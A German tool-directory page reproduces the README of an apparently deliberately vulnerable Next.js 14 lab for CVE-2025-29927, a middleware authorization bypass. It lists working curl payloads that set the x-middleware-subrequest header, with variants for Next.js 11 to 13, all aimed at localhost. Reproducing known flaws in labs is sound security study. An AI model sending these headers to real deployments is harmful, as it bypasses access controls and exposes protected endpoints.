Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
vulnerable-nextjs-14-CVE-2025-29927 — vulnerable-nextjs-14-CVE-2025-29927 | Kitploit
Tools/GitHubGitHub/sugib3o/vulnerable-nextjs-14-cve-2025-29927
Authentifizierung & AutorisierungSchwachstellenanalyseWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubsugib3o/vulnerable-nextjs-14-cve-2025-29927

vulnerable-nextjs-14-CVE-2025-29927

vulnerable-nextjs-14-CVE-2025-29927

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 6 MonatenNoch nicht geprüft

CVE-2025-29927 Reproduktion der Autorisierungsumgehung

Dieses Repository ist eine Reproduktion der CVE-2025-29927-Schwachstelle im Paket next

Reproduktion

  1. Befolgen Sie die folgenden Schritte, um die Next.js-Anwendung zu klonen und auszuführen
  2. Testen Sie, dass die Autorisierung den Zugriff auf den Endpunkt /api/hello verweigert
root@kitploit:~
$ curl http://localhost:3000/api/hello

{"error":"Unauthorized"}%
  1. Testen Sie, dass die Autorisierung funktioniert, wenn ein Token bereitgestellt wird
root@kitploit:~
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3000/api/hello

{"message":"Hello World"}%
  1. Außerdem kann sie umgangen werden, wenn wir middleware 5-mal in den speziellen x-middleware-subrequest-Header verschachteln:
root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/api/hello

{"message":"Hello, World"}

Ausnutzung von CVE-2025-29927 bei älteren Next.js-Versionen

Die Next.js-Versionen 12 und 13 verwendeten eine andere Benennungskonvention für die Middleware-Datei (_middleware.js), die in Next.js 14 in middleware.js geändert wurde. Diese Schwachstelle kann in älteren Versionen ausgenutzt werden, indem die Datei _middleware.js verwendet wird.

Je nach Next.js-Version und Routing-Konvention würden beispielsweise die folgenden Payloads gelten:

  • curl -H "x-middleware-subrequest: middleware" http://localhost:3000/api/hello (für Next.js-Versionen 12.2 mit der Datei middleware.js im Stammverzeichnis der App, nicht im Verzeichnis pages)
    • curl -H "x-middleware-subrequest: src/middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: _middleware" http://localhost:3000/api/hello (für Next.js-Versionen 11 bis 12.2)
  • curl -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: pages/admin/_middleware" http://localhost:3000/api/hello

Erste Schritte

Führen Sie zunächst den Entwicklungsserver aus:

root@kitploit:~
npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev

Öffnen Sie http://localhost:3000 in Ihrem Browser, um das Ergebnis zu sehen.

Sie können die Seite bearbeiten, indem Sie app/page.js ändern. Die Seite wird automatisch aktualisiert, während Sie die Datei bearbeiten.

Dieses Projekt verwendet next/font, um Geist, eine neue Schriftfamilie für Vercel, automatisch zu optimieren und zu laden.

Weitere Informationen

Um mehr über Next.js zu erfahren, werfen Sie einen Blick auf die folgenden Ressourcen:

  • Next.js-Dokumentation - erfahren Sie mehr über die Funktionen und die API von Next.js.
  • Next.js lernen - ein interaktives Next.js-Tutorial.

Sie können sich das Next.js-GitHub-Repository ansehen - Ihr Feedback und Ihre Beiträge sind willkommen!

Auf Vercel bereitstellen

Der einfachste Weg, Ihre Next.js-App bereitzustellen, ist die Nutzung der Vercel-Plattform von den Entwicklern von Next.js.

Weitere Einzelheiten finden Sie in unserer Dokumentation zur Next.js-Bereitstellung.

Tool herunterladen